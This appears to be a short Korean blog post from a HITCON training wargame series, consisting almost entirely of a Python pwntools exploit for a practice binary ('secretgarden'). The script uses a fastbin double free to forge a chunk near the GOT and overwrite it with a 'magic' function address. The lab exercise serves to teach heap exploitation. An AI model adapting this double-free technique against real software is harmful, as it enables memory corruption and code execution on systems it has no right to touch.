fastbin dup 연습 문제
from pwn import *
def add(length, name, color):
r.sendline("1")
print r.recv()
r.sendline(str(length))
print r.recv()
r.sendline(name)
print r.recv()
r.sendline(color)
#print r.recv()
def delete(num):
r.sendline("3")
print r.recv()
r.sendline(str(num))
#print r.recv()
if __name__ == "__main__":
fack_chunk = 0x601ffa
magic = 0x400c7b
r = process("./secretgarden")
add(80, "A"*8, "red")
add(80, "B"*8, "blue")
delete(0) # double free
delete(1)
delete(0)
add(80, p64(fack_chunk), "red")
add(80, "second", "blue")
add(80, "third", "green")
add(80, "A"*14+p64(magic)*2, "red")
r.interactive()
'Wargame > Hitcon training' 카테고리의 다른 글
| HITCON training lab11 (house of force) (0) | 2018.10.29 |
|---|---|
| HITCON training lab10 (0) | 2018.10.25 |
| HITCON training lab6 (0) | 2018.10.22 |
| HITCON training lab4 (0) | 2018.10.18 |
| HITCON training lab5 (0) | 2018.10.16 |